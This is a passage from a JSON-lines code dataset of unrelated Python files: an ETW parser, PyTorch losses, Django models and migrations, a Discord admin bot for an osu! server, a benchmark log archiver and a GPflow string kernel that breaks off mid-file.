"1a2f00607b5285c4e74d5722267267021df2950b", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMicrosoft-Windows-DeviceUx\nGUID : ded165cf-485d-4770-a3e7-9c5f0320e80c\n\"\"\"\nfrom construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct\nfrom etl.utils import WString, CString, SystemTime, Guid\nfrom etl.dtyp import Sid\nfrom etl.parsers.etw.core import Etw, declare, guid\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=51, version=0)\nclass Microsoft_Windows_DeviceUx_51_0(Etw):\n pattern = Struct(\n \"String1\" / WString,\n \"Integer2\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=55, version=0)\nclass Microsoft_Windows_DeviceUx_55_0(Etw):\n pattern = Struct(\n \"String1\" / WString,\n \"Integer2\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=80, version=0)\nclass Microsoft_Windows_DeviceUx_80_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul,\n \"EnumerationTime\" / Int32ul,\n \"CountOfItems\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=81, version=0)\nclass Microsoft_Windows_DeviceUx_81_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul,\n \"EnumerationTime\" / Int32ul,\n \"CountOfItems\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=82, version=0)\nclass Microsoft_Windows_DeviceUx_82_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=83, version=0)\nclass Microsoft_Windows_DeviceUx_83_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=1001, version=0)\nclass Microsoft_Windows_DeviceUx_1001_0(Etw):\n pattern = Struct(\n \"ErrorCode\" / Int32ul\n )\n\n"} {"ext": "py", "sha": "1a2f007c466894ea379b8ab52aff0595035ddc51", "content": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nclass DetLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.hm_criterion = nn.BCEWithLogitsLoss(reduction='none')\n self.ori_criterion = nn.SmoothL1Loss(reduction='none')\n self.box_criterion = nn.SmoothL1Loss(reduction='none')\n\n def forward(self, \n pred_heatmaps, heatmaps,\n pred_sizemaps, sizemaps,\n pred_orimaps , orimaps,\n ):\n\n size_w, _ = heatmaps.max(dim=1, keepdim=True)\n p_det = torch.sigmoid(pred_heatmaps * (1-2*heatmaps))\n \n det_loss = (self.hm_criterion(pred_heatmaps, heatmaps)*p_det).mean() / p_det.mean()\n box_loss = (size_w * self.box_criterion(pred_sizemaps, sizemaps)).mean() / size_w.mean()\n\n ori_loss = (size_w * self.ori_criterion(pred_orimaps, orimaps)).mean() / size_w.mean()\n\n return det_loss, box_loss, ori_loss\n\n\nclass SegLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.criterion = nn.BCEWithLogitsLoss(reduction='none')\n\n def forward(self, pred_bev, bev):\n\n return self.criterion(pred_bev, bev).mean()\n \nclass MotLoss(nn.Module):\n def __init__(self, distill, smooth):\n super().__init__()\n\n self.bc_criterion = nn.L1Loss(reduction='none')\n self.cmd_criterion = nn.BCELoss()\n self.distill = distill\n self.smooth = smooth\n\n def forward(self, plan_locs, cast_locs, locs, pred_cmds, expert_locs, expert_cmds, cmds, idxs=None):\n\n T = locs.size(1)\n N = pred_cmds.size(1)\n\n plan_locs = plan_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n plan_losses = self.bc_criterion(plan_locs, locs).mean(dim=[1,2])\n\n if self.distill:\n cast_loss = self.bc_criterion(cast_locs, expert_locs.detach()).mean()\n cmd_loss = self.cmd_criterion(pred_cmds, expert_cmds.detach())\n else:\n cast_locs = cast_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n cast_loss = self.bc_criterion(cast_locs, locs).mean()\n\n cmds_label = (1.-self.smooth) * F.one_hot(cmds, N) + self.smooth / N\n cmd_loss = self.cmd_criterion(pred_cmds, cmds_label)\n\n if idxs is None:\n plan_loss = plan_losses.mean()\n else:\n plan_loss = plan_losses[idxs].mean()\n\n return (plan_loss + cast_loss) / 2, cmd_loss\n\n def others_forward(self, cast_locs, expert_locs, locs):\n\n if self.distill:\n return self.bc_criterion(cast_locs, expert_locs).mean()\n else:\n other_bc_losses = self.bc_criterion(cast_locs, locs).mean(dim=[2,3])\n return other_bc_losses.min(1)[0].mean()\n\n def bev_forward(self, plan_locs, cast_locs, locs, pred_cmds, cmds, idxs=None):\n\n T = locs.size(1)\n N = pred_cmds.size(1)\n\n plan_locs = plan_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n plan_losses = self.bc_criterion(plan_locs, locs).mean(dim=[1,2])\n \n cast_locs = cast_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n cast_loss = self.bc_criterion(cast_locs, locs).mean()\n\n cmd_loss = self.cmd_criterion(pred_cmds, F.one_hot(cmds, N).float())\n\n if idxs is None:\n plan_loss = plan_losses.mean()\n else:\n plan_loss = plan_losses[idxs].mean()\n\n return (plan_loss + cast_loss) / 2, cmd_loss\n"} {"ext": "py", "sha": "1a2f02c74aa43cde7ade9c2f613bb4934f8f09fb", "content": "from django.db.models.signals import pre_save\nfrom django.dispatch import receiver\nfrom order.models import Order\nfrom order.tpaga import revertedPaid\n\n@receiver(pre_save, sender=Order)\ndef changeReverted(sender, instance, **kwargs):\n try:\n old = sender.objects.get(id=instance.id)\n status = old.status\n except:\n status = 'created'\n \n if instance.status == 'reverted':\n isSuccess = revertedPaid(instance.token)\n if not isSuccess:\n instance.status = status\n instance.save()\n"} {"ext": "py", "sha": "1a2f0367777a5cca73e502e5988c7d1e28d94acf", "content": "import bing_face_api as bfa\n\nif __name__ == '__main__':\n '''\n コマンドライン引数を使用する場合\n 顔認識する画像のディレクトリ\n search_dir = sys.argv[0]\n '''\n # 顔認識する画像のディレクトリ\n search_dir = \"./image/original/\"\n # 顔認識する画像のファイル名を取得\n img_path_list = bfa.get_image_path_list(search_dir)\n # 顔認識\n bfa.detect_image(img_path_list)\n"} {"ext": "py", "sha": "1a2f04aac3c89598aba4363fc45a22d6066611ed", "content": "import pytest\n\nfrom trackash.users.models import User\n\npytestmark = pytest.mark.django_db\n\n\ndef test_user_get_absolute_url(user: User):\n assert user.get_absolute_url() == f\"/users/{user.username}/\"\n"} {"ext": "py", "sha": "1a2f04fc687ba5d8f741dfab722afddcc43a26c3", "content": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.4 on 2017-05-16 13:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\ndef PopulateLevelCreatedDateField(apps, schema_editor):\n level_model = apps.get_model(\"indicators\", \"Level\")\n levels = level_model.objects.all()\n\n for l in levels:\n if l.name == 'Goal':\n l.create_date = '2015-10-03 19:03:50'\n elif l.name == 'Output':\n l.create_date = '2015-10-03 19:03:52'\n elif l.name == 'Outcome':\n l.create_date = '2015-10-03 19:03:51'\n elif l.name == 'Activity':\n l.create_date = '2015-10-03 19:03:53'\n elif l.name == 'Impact':\n l.create_date = '2015-10-03 19:03:54'\n l.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('indicators', '0007_auto_20170510_0749'),\n ]\n\n operations = [\n migrations.RunPython(PopulateLevelCreatedDateField),\n ]\n"} {"ext": "py", "sha": "1a2f067ba59df834f1618b66a58564196c665557", "content": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\ndef get_package_data():\n return {'astropy.nddata.tests': ['data/*.fits']}\n"} {"ext": "py", "sha": "1a2f0859309356f1b27d59011374a656f9780441", "content": "# -*- coding: utf-8 -*-\r\n\r\nimport asyncio\r\nfrom datetime import datetime\r\n\r\nfrom cmyui import log, Ansi\r\nfrom cmyui.osu import Mods\r\nfrom discord import Embed\r\nfrom discord.ext import commands\r\nfrom discord.threads import Thread\r\nfrom tinydb.operations import set as dbset\r\nfrom tinydb.queries import Query\r\n\r\nfrom objects.sakuro import Sakuro, ContextWrap\r\nfrom osu.calculator import Calculator\r\nfrom objects import glob, config\r\nfrom utils.misc import convert_status_str, convert_str_status, make_safe_name, convert_grade_emoji, sakuru_only\r\nfrom objects.user import UserHelper\r\nfrom utils.wrappers import sakuroCommand\r\nfrom utils.misc import BEATMAP_REGEX\r\n\r\nQUEUE_EMOJIS = (\r\n '1️⃣',\r\n '2️⃣',\r\n '3️⃣',\r\n '4️⃣',\r\n '5️⃣'\r\n)\r\n\r\n\r\nclass AdminCog(commands.Cog, name='Admin'):\r\n \"\"\"Utilities for admins.\"\"\"\r\n\r\n def __init__(self, bot: Sakuro):\r\n self.bot = bot\r\n self.hide = True\r\n\r\n @sakuroCommand(name='reload', hidden=True)\r\n @commands.is_owner()\r\n async def _reload(self, ctx: ContextWrap, module: str):\r\n \"\"\"Reloads a module.\"\"\"\r\n try:\r\n self.bot.unload_extension(module)\r\n self.bot.load_extension(module)\r\n except Exception as e:\r\n await ctx.send('\\N{PISTOL}')\r\n await ctx.send('{}: {}'.format(type(e).__name__, e))\r\n else:\r\n await ctx.send('\\N{OK HAND SIGN}')\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.is_owner()\r\n async def shutdown(self, ctx: ContextWrap) -> None:\r\n await ctx.send('Night night..')\r\n await self.bot.close()\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def replay(self, ctx: ContextWrap, nickname: str, mods: str, map_id: int):\r\n player = await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info')\r\n description = \"\"\r\n\r\n if not player:\r\n async with glob.http.get(\"https://sakuru.pw/api/search\", params={\r\n \"q\": nickname\r\n }) as resp:\r\n if resp.status == 200:\r\n data = await resp.json()\r\n\r\n if data['length'] == 0:\r\n return await ctx.send(f\"Nothing matched with {nickname} not found, check your spelling.\")\r\n\r\n embed = Embed(\r\n color=ctx.author.color,\r\n timestamp=datetime.now()\r\n )\r\n\r\n embed.set_author(name=f\"Search queue for {nickname}\")\r\n\r\n for idx, row in enumerate(data['matches']):\r\n description += f\"**{idx + 1}.** [{row['name']}](https://sakuru.pw/u/{row['id']})\\n\"\r\n\r\n embed.description = description\r\n description = \"\"\r\n message = await ctx.send(embed=embed)\r\n\r\n for emoji in QUEUE_EMOJIS[:data['length']]:\r\n await message.add_reaction(emoji)\r\n try:\r\n reaction, user = await self.bot.wait_for('reaction_add',\r\n check=lambda r, u: r.message.id == message.id \\\r\n and r.emoji in QUEUE_EMOJIS \\\r\n and u == ctx.author,\r\n timeout=60.0)\r\n except asyncio.TimeoutError:\r\n await ctx.send('Time is out!')\r\n else:\r\n player = await UserHelper.getOsuUserByName(\r\n make_safe_name(\r\n data['matches'][QUEUE_EMOJIS.index(reaction.emoji)]['name']),\r\n 'info'\r\n )\r\n await message.delete()\r\n else:\r\n return await ctx.send(\"Error! Try again.\")\r\n\r\n scores = await UserHelper.getUserScores(player['id'], 0, mods, 5, 'best', map_id)\r\n\r\n if len(scores) == 0:\r\n return await ctx.send(f\"This player has no scores on `{map_id}`!\")\r\n\r\n map_fullname = \"\"\r\n\r\n for idx, score in enumerate(scores):\r\n calc = await Calculator.calculate(\r\n score['beatmap']['id'],\r\n 0,\r\n score['mods'],\r\n score['acc'],\r\n None\r\n )\r\n map_fullname = calc['map_fullname']\r\n\r\n description += f\"\"\"** {idx + 1}. {f' +{Mods(score[\"mods\"])!r}' if score['mods'] != 0 else ''}** [{calc['stars']:.2f}★]\\n\"\"\" \\\r\n f\"▸ {convert_grade_emoji(score['grade'])} ▸ **{score['pp']:.2f}PP**\" \\\r\n f\"\"\"{f' *({calc[\"pp\"]:.2f}PP for {score[\"acc\"]:.2f}% FC)*' if score['grade'] not in ('S', 'SS', 'X', 'SH') else ''} \"\"\" \\\r\n f\"▸ {score['acc']:.2f}%\\n▸ {score['score']} ▸ x{score['max_combo']}/{score['beatmap']['max_combo']} \" \\\r\n f\"▸ [{score['n300']}/{score['n100']}/{score['n50']}/{score['nmiss']}]\\n\" \\\r\n f\"▸ [Score Set ]\" \\\r\n f\"(https://osu.sakuru.pw/api/get_replay?id={score['id']})\\n\"\r\n\r\n embed = Embed(color=ctx.author.color, description=description)\r\n\r\n embed.set_author(name=f\"Top {len(scores)} Plays for {player['name']} on {map_fullname}\",\r\n url=f\"https://sakuru.pw/u/{player['id']}\",\r\n icon_url=f\"https://sakuru.pw/static/flags/{player['country'].upper()}.png\")\r\n embed.set_footer(text=\"Click on Score Set to download replay.\",\r\n icon_url=\"https://sakuru.pw/static/ingame.png\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def restrict(self, ctx: ContextWrap, nickname: str, *reason: str):\r\n if not await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info'):\r\n return await ctx.send(f\"Player with nickname {nickname} not found.\")\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\",\r\n params={\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"restrict\",\r\n \"nickname\": make_safe_name(nickname),\r\n \"reason\": ' '.join(reason),\r\n \"admin\": admin['safe_name']\r\n }) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n return await ctx.send(\"Error occurred.\")\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def unrestrict(self, ctx: ContextWrap, nickname: str, *reason: str):\r\n if not await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info'):\r\n return await ctx.send(f\"Player with nickname {nickname} not found.\")\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\",\r\n params={\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"unrestrict\",\r\n \"nickname\": make_safe_name(nickname),\r\n \"reason\": ' '.join(reason),\r\n \"admin\": admin['safe_name']\r\n }) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n return await ctx.send(\"Error occurred.\")\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqmap(self, ctx: ContextWrap, status: str, type: str):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n \r\n if ctx.message.channel.archived:\r\n return\r\n\r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n if not admin:\r\n return await ctx.send('who are yo')\r\n \r\n if type not in ('map', 'set'):\r\n msg = await ctx.reply('Invalid type! (map, set)')\r\n\r\n await msg.delete(delay=15)\r\n await ctx.message.delete(delay=15)\r\n return\r\n \r\n if status not in ('love', 'rank', 'unrank'):\r\n msg = await ctx.reply('Invalid status! (love, rank, unrank)')\r\n\r\n await msg.delete(delay=15)\r\n await ctx.message.delete(delay=15)\r\n return\r\n\r\n if type == \"map\": \r\n params = {\r\n \"set_id\": req['beatmap']['set_id']\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmaps = await resp.json()\r\n\r\n embed = Embed(\r\n title=f\"Pick a map to edit status on.\",\r\n timestamp=datetime.now(),\r\n color=0xeaff00\r\n )\r\n\r\n description = \"\"\r\n for idx, bmap in enumerate(bmaps['set']):\r\n description += f\"`#{idx + 1}.` **[{bmap['version']}]** - {convert_status_str(int(bmap['status']))}\\n\"\r\n \r\n embed.description = description\r\n emb_mess = await ctx.send(\"**Send position in chat to pick a map.**\", embed=embed)\r\n \r\n valid = False\r\n while valid is False:\r\n try:\r\n reply = await self.bot.wait_for('message', check=lambda x: x.channel == ctx.channel and x.author == ctx.author and x.content.isdecimal(), \r\n timeout=60.0)\r\n except asyncio.TimeoutError:\r\n msg = await ctx.send('Time is up!')\r\n\r\n await msg.delete(delay=15)\r\n await emb_mess.delete(delay=15)\r\n return\r\n else:\r\n reply.content = int(reply.content)\r\n if reply.content > len(bmaps) or reply.content <= 0:\r\n msg = await ctx.send('Specified position is out of range.')\r\n \r\n await reply.delete(delay=15)\r\n await msg.delete(delay=15)\r\n else:\r\n if (bm_status := bmaps['set'][reply.content - 1]['status']) == convert_str_status(status):\r\n msg = await ctx.send(f\"This map is already {convert_status_str(bm_status)}\")\r\n \r\n await msg.delete(delay=15)\r\n await reply.delete(delay=15)\r\n else:\r\n await reply.delete()\r\n await emb_mess.delete()\r\n\r\n valid = True\r\n \r\n params = {\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"status_map\",\r\n \"admin\": admin['safe_name'],\r\n \"map_id\": bmaps['set'][reply.content - 1]['id'],\r\n \"status\": status\r\n }\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\", params=params) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n pass\r\n\r\n elif type ==\"set\":\r\n params = {\r\n \"set_id\": req['beatmap']['set_id']\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmaps = await resp.json()\r\n \r\n\r\n if all([x['status'] == convert_str_status(status) for x in bmaps['set']]):\r\n msg = await ctx.send(f\"This set is already {convert_status_str(bmaps['set'][0]['status'])}\")\r\n\r\n await ctx.message.delete(delay=15)\r\n await msg.delete(delay=15)\r\n return\r\n\r\n params = {\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"status_set\",\r\n \"admin\": admin['safe_name'],\r\n \"set_id\": req['beatmap']['set_id'],\r\n \"status\": status\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\", params=params) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n pass\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqclose(self, ctx: ContextWrap):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n\r\n if ctx.message.channel.archived:\r\n return\r\n \r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n \r\n req_table.update(\r\n dbset('active', False),\r\n doc_ids=[req.doc_id]\r\n )\r\n \r\n first_message = await ctx.message.channel.parent.fetch_message(req['original_id'])\r\n \r\n await first_message.delete()\r\n await ctx.channel.delete()\r\n \r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqreject(self, ctx: ContextWrap, *reason: str):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n \r\n if ctx.message.channel.archived:\r\n return\r\n\r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n\r\n first_message = await ctx.message.channel.parent.fetch_message(req['original_id'])\r\n requester = ctx.guild.get_member(req['requester'])\r\n\r\n params = {\r\n \"id\": req['beatmap']['id']\r\n }\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmap = (await resp.json())['map']\r\n embed = Embed(\r\n title=f\"Map Request: {bmap['artist']} - {bmap['title']}\",\r\n color=ctx.author.color,\r\n description=f\"Your request has been rejected!\\n**Reason:** `{' '.join(reason)}`\\n\\n**Nominator:** {ctx.author.mention}\",\r\n timestamp=datetime.now()\r\n )\r\n\r\n embed.set_footer(text=\"Sakuru.pw osu! Private Server.\")\r\n embed.set_thumbnail(url=ctx.author.avatar.url)\r\n\r\n\r\n await requester.send(embed=embed)\r\n\r\n req_table.update(\r\n dbset('active', False),\r\n doc_ids=[req.doc_id]\r\n )\r\n\r\n await first_message.delete()\r\n await ctx.channel.delete()\r\n\r\ndef setup(bot):\r\n log(f\"Initiated {__name__} cog!\", Ansi.CYAN)\r\n bot.add_cog(AdminCog(bot))\r\n"} {"ext": "py", "sha": "1a2f0ac319a265e0b76169a4682ed41ed56851e5", "content": "#\n# Archives, to the specified folder, the logged output generated by a benchmark\n# run.\n#\n# @author A. Shawn Bandy\nimport os\nimport zipfile\nimport datetime\nimport requests\n# Follows closely from:\n# http://stackoverflow.com/a/34153816\n#\n# Paths to the log folders are generated by TFB and where those files\n# should be archived.\n#\npath_in = os.path.abspath(os.path.normpath(os.path.expanduser(os.path.join( \\\n os.environ['TFB_REPOPARENT'], os.environ['TFB_REPONAME'], \\\n 'results'))))\ndate_time = datetime.datetime.now()\ndt_folder = date_time.strftime('%Y%m%d%H%M%S')\npath_out = os.path.abspath(os.path.join(os.environ['TFB_LOGSFOLDER'], \\\n dt_folder))\n\nif not os.path.exists(path_out):\n os.makedirs(path_out)\n\nzip_path = path_out + '/results.zip'\n\nzip_file = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)\n\nfor root, dirs, files in os.walk(path_in):\n for file in files:\n zip_file.write(os.path.join(root, file))\n\nzip_file.close()\n\nresults_upload_uri = os.environ['TFB_UPLOADURI']\n\nif results_upload_uri != None:\n with open(zip_path, 'rb') as file_to_upload:\n requests.post(\n results_upload_uri,\n headers={'Content-Type': 'application/zip'},\n data=file_to_upload)\n"} {"ext": "py", "sha": "1a2f0b32b85926219cf94d50683571fd5d476b22", "content": "from django.contrib import admin\r\nfrom .models import Project, Course, Message, Demos\r\nfrom django.contrib.auth.models import Group\r\n\r\nclass CourseAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'category', 'date_created', 'link')\r\n\r\nclass ProjectAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'date_created', 'link')\r\n\r\nclass MessageAdmin(admin.ModelAdmin):\r\n\tlist_display = ('email', 'name', 'text', 'received', 'replied', 'date_created')\r\n\r\nclass DemosAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'demo_url')\r\n\r\nadmin.site.register(Course, CourseAdmin)\r\nadmin.site.register(Project, ProjectAdmin)\r\nadmin.site.register(Message, MessageAdmin)\r\nadmin.site.register(Demos, DemosAdmin)\r\nadmin.site.unregister(Group)"} {"ext": "py", "sha": "1a2f0caa5c880e7e202fdd47b38ad89340290b44", "content": "from gpflow.kernels import Kernel\nfrom gpflow.utilities import positive\nfrom gpflow import Parameter\nimport tensorflow as tf\nfrom tensorflow_probability import bijectors as tfb\n\nclass Batch_simple_SSK(Kernel):\n \"\"\"\n with hyperparameters:\n 1) match_decay float\n decrease the contribution of long subsequences\n 3) max_subsequence_length int \n largest subsequence considered\n \"\"\"\n\n def __init__(self,active_dims=[0],decay=0.1,max_subsequence_length=3,\n alphabet = [], maxlen=0, batch_size=100):\n super().__init__(active_dims=active_dims)\n # constrain decay kernel params to between 0 and 1\n self.logistic = tfb.Chain([tfb.Shift(tf.cast(0,tf.float64))(tfb.Scale(tf.cast(1,tf.float64))),tfb.Sigmoid()])\n self.decay_param= Parameter(decay, transform=self.logistic ,name=\"decay\")\n\n # use will use copies of the kernel params to stop building expensive computation graph\n # we instead efficientely calculate gradients using dynamic programming\n # These params are updated at every call to K and K_diag (to check if parameters have been updated)\n self.decay = self.decay_param.numpy()\n\n self.decay_unconstrained = self.decay_param.unconstrained_variable.numpy()\n\n self.order_coefs=tf.ones(max_subsequence_length,dtype=tf.float64)\n \n # store additional kernel parameters\n self.max_subsequence_length = tf.constant(max_subsequence_length)\n self.alphabet = tf.constant(alphabet)\n self.alphabet_size=tf.shape(self.alphabet)[0]\n self.maxlen = tf.constant(maxlen)\n self.batch_size = tf.constant(batch_size)\n\n # build a lookup table of the alphabet to encode input strings\n self.table = tf.lookup.StaticHashTable(\n initializer=tf.lookup.KeyValueTensorInitializer(\n keys=tf.constant([\"PAD\"]+alphabet),\n values=tf.constant(range(0,len(alphabet)+1)),),default_value=0)\n\n # initialize helful construction matricies to be lazily computed once needed\n self.D = None\n self.dD_dgap = None\n\n\n def K_diag(self, X):\n r\"\"\"\n The diagonal elements of the string kernel are always unity (due to normalisation)\n \"\"\"\n return tf.ones(tf.shape(X)[:-1],dtype=tf.float64)\n\n\n\n def K(self, X1, X2=None):\n r\"\"\"\n Vectorized kernel calc.\n Following notation from Beck (2017), i.e have tensors S,D,Kpp,Kp\n Input is two tensors of shape (# strings , # characters)\n and we calc the pair-wise kernel calcs between the elements (i.e n kern calcs for two lists of length n)\n D is the tensor than unrolls the recursion and allows vecotrizaiton\n \"\"\"\n\n # Turn our inputs into lists of integers using one-hot embedding\n # first split up strings and pad to fixed length and prep for gpu\n # pad until all have length of self.maxlen\n # turn into one-hot i.e. shape (# strings, #characters+1, alphabet size)\n X1 = tf.strings.split(tf.squeeze(X1,1)).to_tensor(\"PAD\",shape=[None,self.maxlen])\n X1 = self.table.lookup(X1)\n # keep track of original input sizes\n X1_shape = tf.shape(X1)[0]\n X1 = tf.one_hot(X1,self.alphabet_size+1,dtype=tf.float64)\n if X2 is None:\n X2 = X1\n X2_shape = X1_shape\n self.symmetric = True\n else:\n self.symmetric = False\n X2 = tf.strings.split(tf.squeeze(X2,1)).to_tensor(\"PAD\",shape=[None,self.maxlen])\n X2 = self.table.lookup(X2)\n X2_shape = tf.shape(X2)[0]\n X2 = tf.one_hot(X2,self.alphabet_size+1,dtype=tf.float64)\n \n # prep the decay tensors \n self._precalc()\n \n\n\n # combine all target strings and remove the ones in the first column that encode the padding (i.e we dont want them to count as a match)\n X_full = tf.concat([X1,X2],0)[:,:,1:]\n\n # get indicies of all possible pairings from X and X2\n # this way allows maximum number of kernel calcs to be squished onto the GPU (rather than just doing individual rows of gram)\n indicies_2, indicies_1 = tf.meshgrid(tf.range(0, X1_shape ),tf.range(X1_shape , tf.shape(X_full)[0]))\n indicies = tf.concat([tf.reshape(indicies_1,(-1,1)),tf.reshape(indicies_2,(-1,1))],axis=1)\n if self.symmetric:\n # if symmetric then only calc upper matrix (fill in rest later)\n indicies = tf.boolean_mask(indicies,tf.greater_equal(indicies[:,1]+ X1_shape ,indicies[:,0]))\n else:\n # if not symmetric need to calculate some extra kernel evals for the normalization later on\n indicies = tf.concat([indicies,tf.tile(tf.expand_dims(tf.range(tf.shape(X_full)[0]),1),(1,2))],0)\n\n # make kernel calcs in batches\n num_batches = tf.cast(tf.math.ceil(tf.shape(indicies)[0]/self.batch_size),dtype=tf.int32)\n k_split = tf.TensorArray(tf.float64, size=num_batches,clear_after_read=False,infer_shape=False)\n \n\n # iterate through batches\n for j in tf.range(num_batches):\n # collect strings for this batch\n indicies_batch = indicies[self.batch_size*j:self.batch_size*(j+1)]\n X_batch = tf.gather(X_full,indicies_batch[:,0],axis=0)\n X2_batch = tf.gather(X_full,indicies_batch[:,1],axis=0)\n\n # Make S: the similarity tensor of shape (# strings, #characters, # characters)\n #S = tf.matmul( tf.matmul(X_batch,self.sim),tf.transpose(X2_batch,perm=(0,2,1)))\n S = tf.matmul(X_batch,tf.transpose(X2_batch,perm=(0,2,1)))\n # collect results for the batch\n result = self.kernel_calc(S)\n k_split = k_split.write(j,result)\n\n # combine batch results\n k = tf.expand_dims(k_split.concat(),1)\n k_split.close()\n\n # put results into the right places in the gram matrix and normalize\n if self.symmetric:\n # if symmetric then only put in top triangle (inc diag)\n mask = tf.linalg.band_part(tf.ones((X1_shape,X2_shape),dtype=tf.int64), 0, -1)\n non_zero = tf.not_equal(mask, tf.constant(0, dtype=tf.int64))\n \n # Extracting the indices of upper triangle elements\n indices = tf.where(non_zero)\n out = tf.SparseTensor(indices,tf.squeeze(k),dense_shape=tf.cast((X1_shape,X2_shape),dtype=tf.int64))\n k_results = tf.sparse.to_dense(out)\n \n # add in mising elements (lower diagonal)\n k_results = k_results + tf.linalg.set_diag(tf.transpose(k_results),tf.zeros(X1_shape,dtype=tf.float64))\n \n # normalise\n X_diag_Ks = tf.linalg.diag_part(k_results)\n norm = tf.tensordot(X_diag_Ks, X_diag_Ks,axes=0)\n k_results = tf.divide(k_results, tf.sqrt(norm))\n else:\n\n # otherwise can just reshape into gram matrix\n # but first take extra kernel calcs off end of k and use them to normalise\n X_diag_Ks = 